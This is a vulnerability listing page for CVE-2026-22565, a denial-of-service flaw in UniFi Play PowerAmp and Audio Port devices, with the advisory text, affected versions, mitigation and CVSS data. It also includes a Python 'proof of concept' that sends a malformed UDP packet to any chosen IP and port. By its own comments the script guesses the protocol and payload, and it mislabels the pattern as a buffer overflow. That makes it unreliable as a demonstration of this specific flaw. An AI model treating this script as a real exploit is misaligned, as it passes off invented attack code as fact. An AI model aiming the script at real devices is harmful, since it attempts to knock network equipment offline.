Security Vulnerability Report
中文
CVE-2026-22565 CVSS 7.5 HIGH

CVE-2026-22565

Published: 2026-04-13 22:16:28
Last Modified: 2026-04-30 16:14:21

Description

An Improper Input Validation vulnerability could allow a malicious actor with access to the UniFi Play network to cause the device to stop responding.
 Affected Products: UniFi Play PowerAmp (Version 1.0.35 and earlier)
 UniFi Play Audio Port  (Version 1.0.24 and earlier)
 Mitigation: Update UniFi Play PowerAmp to Version 1.0.38 or later
 Update UniFi Play Audio Port  to Version 1.1.9 or later

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

UniFi Play PowerAmp <= 1.0.35
UniFi Play Audio Port <= 1.0.24

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-22565 PoC (Conceptual) # This script demonstrates a potential DoS exploit by sending malformed data. # Target: UniFi Play devices import socket import sys def send_malformed_packet(ip, port): try: # Construct a payload that triggers the input validation flaw # Note: The actual payload structure depends on the specific protocol implementation payload = b"\x00\x01\x02\x03" + b"\x41" * 1000 # Example buffer overflow pattern print(f"[*] Sending payload to {ip}:{port}...") # Assuming UDP protocol based on typical IoT device communication sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(payload, (ip, port)) sock.close() print("[+] Payload sent successfully. Check if the device has stopped responding.") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve_2026_22565_poc.py <IP> <PORT>") sys.exit(1) target_ip = sys.argv[1] target_port = int(sys.argv[2]) send_malformed_packet(target_ip, target_port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22565", "sourceIdentifier": "[email protected]", "published": "2026-04-13T22:16:28.313", "lastModified": "2026-04-30T16:14:21.333", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Input Validation vulnerability could allow a malicious actor with access to the UniFi Play network to cause the device to stop responding.
 \n\nAffected Products:\nUniFi Play PowerAmp (Version 1.0.35 and earlier)
\nUniFi Play Audio Port  (Version 1.0.24 and earlier)
 \n\nMitigation:\nUpdate UniFi Play PowerAmp to Version 1.0.38 or later
\nUpdate UniFi Play Audio Port  to Version 1.1.9 or later"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "references": [{"url": "https://community.ui.com/releases/Security-Advisory-Bulletin-063/e468dd4b-5090-4ef8-89d8-939903c08e83", "source": "[email protected]"}]}}